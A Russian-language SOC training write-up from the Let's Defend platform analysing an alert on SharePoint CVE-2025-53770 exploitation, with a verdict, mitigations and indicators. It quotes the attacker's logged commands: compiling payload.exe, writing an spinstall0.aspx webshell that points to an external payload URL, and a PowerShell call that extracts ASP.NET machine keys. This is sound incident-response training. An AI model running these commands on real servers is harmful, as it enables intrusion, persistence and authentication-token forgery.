Мероприятие для тренировки навыков анализа и составления отчетов
Это исследование, проведенное на платформе Let's Defend, основанное на недавней уязвимости SharePoint CVE. Давайте взглянем.
Правило SOC342 обнаружило неаутентифицированный POST-запрос, нацеленный на уязвимую страницу ToolPane.aspx, с:
большим полезными данными (Content-Length: 7699)
подозрительным реферером (SignOut.aspx), вероятно, используемым для сокрытия источника
поведением, соответствующим эксплуатации уязвимости ToolShell
Внешний пользователь (IP: 107.191.58.76) отправил сконструированный запрос внутреннему серверу SharePoint (172.16.20.17).
Проанализируем лог нашей конечной точки.
Процесс w3wp.exe, выполняющий закодированную команду PowerShell, может указывать на потенциальную эксплуатацию или активность после эксплуатации (например, выполнение скрытой нагрузки).
В среде SharePoint важно проверить, является ли такое поведение ожидаемым или представляет собой злоупотребление.
Команда была обфусцирована с помощью base64.
Эта нагрузка позволяет атакующему извлекать и выводить критические ключи конфигурации ASP.NET с компьютера, на котором она выполняется.
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs
"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
Компилирует исполняемый файл из исходного кода C# на сервере.
Создает веб-бэкдор (вредоносный ASPX-файл) в каталоге SharePoint, который при посещении позволяет выполнить или загрузить внешнюю нагрузку.
cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
Эта команда создает файл spinstall0.aspx в папке SharePoint LAYOUTS и записывает в него содержимое (здесь является заполнителем, представляющим код веб-шелла).
Вот хэш spinstall0.apx: 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514
Взглянем на VirusTotal.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"
Эта команда позволяет атакующему получить доступ к конфигурации приложения MachineKeySection, что может раскрыть важные криптографические ключи, такие как ключ проверки и ключ расшифровки.
Эти ключи критически важны для безопасности ASP.NET, защищая такие вещи, как файлы cookie аутентификации и ViewState.
Раскрытие или получение этих ключей может позволить злоумышленникам подделывать токены аутентификации, расшифровывать защищенные данные или выполнять другие атаки на веб-приложение.
MITRE ATT&CK

Примечание аналитика:
Оповещение было сгенерировано из-за необычной активности PowerShell на сервере SharePoint, которая позже была определена как попытка эксплуатации уязвимости CVE-2025-53770. Атакующий сначала загрузил и скомпилировал пользовательский C# исполняемый файл (payload.exe) с помощью компилятора C# (csc.exe), затем создал вредоносный ASPX веб-шелл (spinstall0.aspx) в веб-доступном каталоге SharePoint. Впоследствии была запущена команда PowerShell для извлечения важных криптографических ключей с сервера через рефлексию .NET. Эта последовательность действий предполагает многофазную атаку, предназначенную для поддержания постоянного контроля и, возможно, подделки токенов аутентификации. Веб-шелл был подтвержден как вредоносный с коэффициентом обнаружения VirusTotal 39/62. Инцидент подтвержден как истинно положительный, и рекомендуется принять дальнейшие меры по сдерживанию и устранению последствий.

Детали CVE-2025-53770
Десериализация недоверенных данных в локальном Microsoft SharePoint Server позволяет неавторизованному злоумышленнику выполнять код по сети. Microsoft известно, что эксплойт для CVE-2025-53770 существует в природе. Microsoft готовит и тщательно тестирует комплексное обновление для устранения этой уязвимости. Тем временем, пожалуйста, убедитесь, что меры по смягчению последствий, указанные в этой документации CVE, внедрены, чтобы вы были защищены от эксплуатации.

Меры по смягчению последствий, рекомендованные Microsoft: Чтобы смягчить потенциальные атаки, клиенты должны:
Использовать поддерживаемые версии локального SharePoint Server.
Применить последние обновления безопасности, указанные выше.
Развернуть защиту Microsoft Defender для конечных точек или эквивалентные решения для защиты от угроз.
Убедиться, что интерфейс сканирования антивирусного ПО (AMSI) включен и правильно настроен, а также используется соответствующее антивирусное решение, такое как Defender Antivirus.
Сбросить ключи ASP.NET SharePoint Server.
IoC
Spinstall0.aspx Веб-шелл, используемый злоумышленниками
Злоумышленники также изменяли имя файла различными способами – например, spinstall.aspx, spinstall1.aspx, spinstall2.aspx.
Этот отчет основан на активности, проведенной на платформе Let's Defend. Все представленные результаты и материалы предназначены только для образовательных целей. Все права и право собственности принадлежат Let's Defend.